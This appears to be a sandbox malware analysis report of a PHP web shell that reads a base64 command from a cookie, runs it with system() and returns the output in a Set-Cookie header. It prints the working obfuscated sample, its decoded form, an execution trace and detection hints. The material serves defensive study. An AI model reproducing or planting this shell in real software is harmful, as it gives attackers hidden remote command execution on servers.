PHP Malware Analysis — cookie-driven web shell: the command arrives base64-encoded in a request cookie and the command output is returned inside a Set-Cookie response header, so neither the URL/POST body nor the response body carries anything attacker-specific.

u413x.php, u413x.txt

md5: f2160cdbcdc06aa1bf41c708a6984bd8


Deobfuscated PHP code (PHPDeobfuscator output; the `eval { ... }` wrapper is the tool's notation for the decoded payload that the original file passes to eval(), not valid PHP syntax)

<?php

// Analyst annotation (on the deobfuscator's output, not the raw sample):
// this is a cookie-driven web shell. The only inputs it reads are request
// cookies (cm, cn, cp) and the only output it produces is a Set-Cookie
// response header; nothing is taken from the query string or POST body and
// nothing is written to the response body.
//
// Hunting hints grounded in the code below: requests to this file carrying
// cookies named cm/cn/cp, and responses from it that set an unexpected cookie
// whose value is a long base64 string bracketed by a repeated marker.

// In the original one-liner this is built as strrev("edoced_4"."6esab") so
// the literal "base64_decode" never appears in the file (see the strrev call
// in the execution trace); $b is used once, to decode the eval'd payload.
$b = "base64_decode";
// Deobfuscator notation: the block below is what the original file decodes
// (str_replace of spaces, then base64) and passes to eval().
eval /* PHPDeobfuscator eval output */ {
    // Trigger: a cookie named "cm" (the command). Without it the request is a
    // no-op, which is exactly what the recorded execution trace shows.
    if (isset($_COOKIE['cm'])) {
        ob_start();
        // Command execution: the base64-decoded cookie value is handed to the
        // shell verbatim (no escapeshellarg()/escapeshellcmd()), with stderr
        // merged into stdout so error text is captured as well.
        system(base64_decode($_COOKIE['cm']) . ' 2>&1');
        // Exfiltration channel: buffered output is base64-encoded, wrapped on
        // both sides by the attacker-chosen marker cookie "cp", and emitted as
        // a Set-Cookie header whose name is the attacker-chosen cookie "cn".
        // Note that cn and cp are read without an isset() check; only cm gates.
        setcookie($_COOKIE['cn'], $_COOKIE['cp'] . base64_encode(ob_get_contents()) . $_COOKIE['cp']);
        // The buffer is discarded, so the response body never shows the
        // command output (the generated HTML below is an empty document).
        ob_end_clean();
    }
};

Execution traces (function trace in Xdebug format from a sandbox request with no "cm" cookie present: the payload is decoded and eval'd, its isset() check fails, and it returns without ever calling system() or setcookie())

data/traces/f2160cdbcdc06aa1bf41c708a6984bd8_trace-1676260545.6547.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:56:11.552538]
1	0	1	0.000153	393512
1	3	0	0.000206	394648	{main}	1		/var/www/html/uploads/u413x.php	0	0
2	4	0	0.000222	394648	strrev	0		/var/www/html/uploads/u413x.php	1	1	'edoced_46esab'
2	4	1	0.000239	394720
2	4	R			'base64_decode'
1		A						/var/www/html/uploads/u413x.php	1	$b = 'base64_decode'
2	5	0	0.000266	394688	str_replace	0		/var/www/html/uploads/u413x.php	1	3	' '	''	'a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = '
2	5	1	0.000308	395104
2	5	R			'aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30='
2	6	0	0.000334	395008	base64_decode	0		/var/www/html/uploads/u413x.php	1	1	'aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30='
2	6	1	0.000357	395360
2	6	R			'if(isset($_COOKIE[\'cm\'])){ob_start();system(base64_decode($_COOKIE[\'cm\']).\' 2>&1\');setcookie($_COOKIE[\'cn\'],$_COOKIE[\'cp\'].base64_encode(ob_get_contents()).$_COOKIE[\'cp\']);ob_end_clean();}'
2	7	0	0.000402	398552	eval	1	'if(isset($_COOKIE[\'cm\'])){ob_start();system(base64_decode($_COOKIE[\'cm\']).\' 2>&1\');setcookie($_COOKIE[\'cn\'],$_COOKIE[\'cp\'].base64_encode(ob_get_contents()).$_COOKIE[\'cp\']);ob_end_clean();}'	/var/www/html/uploads/u413x.php	1	0
2	7	1	0.000424	398552
1	3	1	0.000432	395504
			0.000455	314520
TRACE END   [2023-02-13 01:56:11.552869]


Generated HTML output (an empty document: the sample prints nothing itself, and ob_end_clean() discards the captured command output, so even a successful command leaves no trace in the response body — only in the Set-Cookie header)

<html><head></head><body></body></html>

Original (obfuscated) PHP code — the function name is hidden via strrev() on a split string and the payload is space-padded base64, which is why a plain grep for "base64_decode" or "system(" does not match this file

<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>